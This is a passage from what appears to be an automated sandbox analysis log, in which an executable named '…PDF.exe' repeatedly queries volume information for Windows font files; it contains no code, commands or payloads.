              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
